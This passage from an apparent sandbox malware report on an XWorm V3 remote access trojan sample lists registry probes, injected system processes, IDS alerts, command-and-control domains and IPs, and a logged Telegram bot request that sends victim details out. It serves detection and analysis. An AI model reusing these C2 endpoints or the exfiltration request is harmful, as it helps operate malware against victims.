                          Source: C:\Users\Public\DeadCodeRootKit.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                          Source: C:\Users\Public\DeadCodeRootKit.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                          Source: C:\Users\Public\DeadCodeRootKit.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                          Source: C:\Users\Public\DeadCodeRootKit.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                          Source: C:\Users\Public\DeadCodeRootKit.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                          Source: C:\Users\Public\DeadCodeRootKit.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                          Source: C:\Windows\System32\dllhost.exeCode function: 6_2_000002E86A09BF5C FindFirstFileExW,6_2_000002E86A09BF5C
                          Source: C:\Windows\System32\winlogon.exeCode function: 11_2_00000225DC64BF5C FindFirstFileExW,11_2_00000225DC64BF5C
                          Source: C:\Windows\System32\lsass.exeCode function: 12_2_00000202C0AEBF5C FindFirstFileExW,12_2_00000202C0AEBF5C
                          Source: C:\Windows\System32\svchost.exeCode function: 14_2_000002A66130BF5C FindFirstFileExW,14_2_000002A66130BF5C
                          Source: C:\Windows\System32\dwm.exeCode function: 16_2_000002BAAF21BF5C FindFirstFileExW,16_2_000002BAAF21BF5C
                          Source: C:\Windows\System32\svchost.exeCode function: 17_2_0000026A879CBF5C FindFirstFileExW,17_2_0000026A879CBF5C
                          Source: C:\Windows\System32\svchost.exeCode function: 19_2_00000179537ABF5C FindFirstFileExW,19_2_00000179537ABF5C
                          Source: C:\Windows\System32\svchost.exeCode function: 20_2_000002295D56BF5C FindFirstFileExW,20_2_000002295D56BF5C

                          Networking

                          Source: Network traffic | Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49738 -> 147.185.221.21:28600
                          Source: Network traffic | Suricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.4:49739 -> 149.154.167.220:443
                          Source: C:\Windows\System32\svchost.exe | Domain query: updates-full.gl.at.ply.gg
                          Source: C:\Windows\System32\svchost.exe | Domain query: subscribe-bond.gl.at.ply.gg
                          Source: C:\Windows\System32\svchost.exe | Domain query: api.telegram.org
                          Source: Malware configuration extractor | URLs: subscribe-bond.gl.at.ply.gg
                          Source: unknown | DNS query: name: api.telegram.org
                          Source: Yara match | File source: 2.0.DeadROOTkit.exe.1a0000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: C:\Users\user\AppData\Local\DeadROOTkit.exe, type: DROPPED
                          Source: Yara match | File source: C:\Users\Public\DeadROOTkit.exe, type: DROPPED
                          Source: global traffic | TCP traffic: 192.168.2.4:49731 -> 147.185.221.21:28600
                          Source: global traffic | TCP traffic: 192.168.2.4:49740 -> 147.185.221.20:60075
                          Source: global traffic | TCP traffic: 192.168.2.4:52581 -> 1.1.1.1:53
                          Source: global traffic | HTTP traffic detected: GET /botYour_Token/sendMessage?chat_id=Your_ID&text=%E2%98%A0%20%5BXWorm%20V3.0%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A161EDF6F280165B1D298%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
                          Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
                          Source: Joe Sandbox View | IP Address: 208.95.112.1 208.95.112.1
                          Source: Joe Sandbox View | IP Address: 149.154.167.220 149.154.167.220
                          Source: Joe Sandbox View | ASN Name: TUT-ASUS TUT-ASUS
                          Source: Joe Sandbox View | ASN Name: TELEGRAMRU TELEGRAMRU
                          Source: Joe Sandbox View | ASN Name: SALSGIVERUS SALSGIVERUS
                          Source: Joe Sandbox View | ASN Name: SALSGIVERUS SALSGIVERUS
                          Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                          Source: unknown | DNS query: name: ip-api.com
                          Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: global traffic | HTTP traffic detected: GET /botYour_Token/sendMessage?chat_id=Your_ID&text=%E2%98%A0%20%5BXWorm%20V3.0%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A161EDF6F280165B1D298%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
                          Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
                          Source: global traffic | DNS traffic detected: DNS query: ip-api.com
                          Source: global traffic | DNS traffic detected: DNS query: subscribe-bond.gl.at.ply.gg
                          Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
                          Source: global traffic | DNS traffic detected: DNS query: updates-full.gl.at.ply.gg
                          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Sun, 13 Oct 2024 17:15:49 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                          Source: DeadROOTkit.exe, 00000002.00000002.2956134718.000000000243F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                          Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774122233.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C03B3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                          Source: lsass.exe, 0000000C.00000000.1763590382.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2974624894.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774441153.00000202C0402000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                          Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763590382.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2952382254.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                          Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774122233.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763590382.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.2189100927.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.1786428389.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1766962440.00000202C037F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                          Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774122233.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.2189100927.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.1786428389.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2967895483.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1766962440.00000202C037F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
                          Source: lsass.exe, 0000000C.00000002.2974624894.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774441153.00000202C0402000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                          Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774122233.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C03B3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                          Source: lsass.exe, 0000000C.00000000.1763590382.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2974624894.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774441153.00000202C0402000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                          Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774122233.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763590382.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.2189100927.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.1786428389.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1766962440.00000202C037F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                          Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763590382.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2952382254.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                          Source: lsass.exe, 0000000C.00000002.2974624894.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774441153.00000202C0402000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                          Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774122233.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.2189100927.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.1786428389.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2967895483.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1766962440.00000202C037F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
                          Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774915423.00000202C043D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763730672.00000202C024B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                          Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774122233.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C03B3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                          Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763590382.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2952382254.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                          Source: lsass.exe, 0000000C.00000002.2974624894.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774441153.00000202C0402000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                          Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774122233.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.2189100927.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.1786428389.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2967895483.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1766962440.00000202C037F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
                          Source: lsass.exe, 0000000C.00000000.1763590382.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2952382254.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                          Source: lsass.exe, 0000000C.00000002.2957284217.00000202C0200000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763730672.00000202C0200000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                          Source: lsass.exe, 0000000C.00000000.1763228169.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2948416778.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
                          Source: lsass.exe, 0000000C.00000002.2949177193.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763357769.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
                          Source: lsass.exe, 0000000C.00000000.1763228169.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2948416778.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                          Source: DeadROOTkit.exe, 00000002.00000002.2956134718.0000000002311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                          Source: mIURiU8n2P.exe, 00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000002.2956134718.0000000002311000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000000.1701692705.00000000001A2000.00000002.00000001.01000000.00000008.sdmp, DeadROOTkit.exe.2.drString found in binary or memory: http://ip-api.com/line/?fields=hosting
                          Source: powershell.exe, 00000004.00000002.1899586399.0000011113902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1899586399.0000011113AA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1839365843.000002DE90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2052291589.000001F091483000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                          Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774122233.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763590382.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2952382254.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2974624894.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.2189100927.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.1786428389.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1766962440.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774441153.00000202C0402000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                          Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774915423.00000202C043D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763730672.00000202C024B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                          Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774122233.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.2189100927.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.1786428389.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2967895483.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1766962440.00000202C037F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0H
                          Source: lsass.exe, 0000000C.00000002.2974624894.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774441153.00000202C0402000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
                          Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.2189100927.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763730672.00000202C024B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.1786428389.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1766962440.00000202C037F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                          Source: powershell.exe, 0000001D.00000002.1922708453.000001F081639000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                          Source: svchost.exe, 0000001A.00000002.2962138490.00000241A96E0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                          Source: svchost.exe, 00000016.00000002.3001209327.000001845BB84000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.msoftP
                          Source: powershell.exe, 00000007.00000002.1786234964.000002DE80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1922708453.000001F081639000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                          Source: lsass.exe, 0000000C.00000000.1763228169.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2948416778.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                          Source: lsass.exe, 0000000C.00000000.1763228169.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2948416778.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                          Source: DeadXClient.exe, 00000001.00000002.2955878706.0000000002901000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000002.2956134718.0000000002311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1779642673.0000011103891000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1786234964.000002DE80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1922708453.000001F081411000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: lsass.exe, 0000000C.00000002.2949177193.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763357769.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763228169.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2948416778.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
                          Source: powershell.exe, 00000007.00000002.1786234964.000002DE80229000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763228169.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2948416778.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1922708453.000001F081639000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                          Source: lsass.exe, 0000000C.00000000.1763228169.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2948416778.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
                          Source: lsass.exe, 0000000C.00000000.1763228169.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2948416778.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
                          Source: powershell.exe, 0000001D.00000002.1922708453.000001F081639000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                          Source: lsass.exe, 0000000C.00000002.2974624894.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774441153.00000202C0402000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774122233.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.2189100927.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.1786428389.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2967895483.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1766962440.00000202C037F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.digicert.com/CPS0~
Source: svchost.exe, 00000028.00000002.3011157363.000001AABFC8F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000028.00000000.1926814755.000001AABFC8F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.msftconnecttest.com
Source: svchost.exe, 00000028.00000002.3011157363.000001AABFC8F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000028.00000000.1926814755.000001AABFC8F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.msftconnecttest.com/
Source: powershell.exe, 00000004.00000002.1779642673.0000011103891000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1786234964.000002DE80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1922708453.000001F081411000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: DeadROOTkit.exe, 00000002.00000002.2956134718.000000000235B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
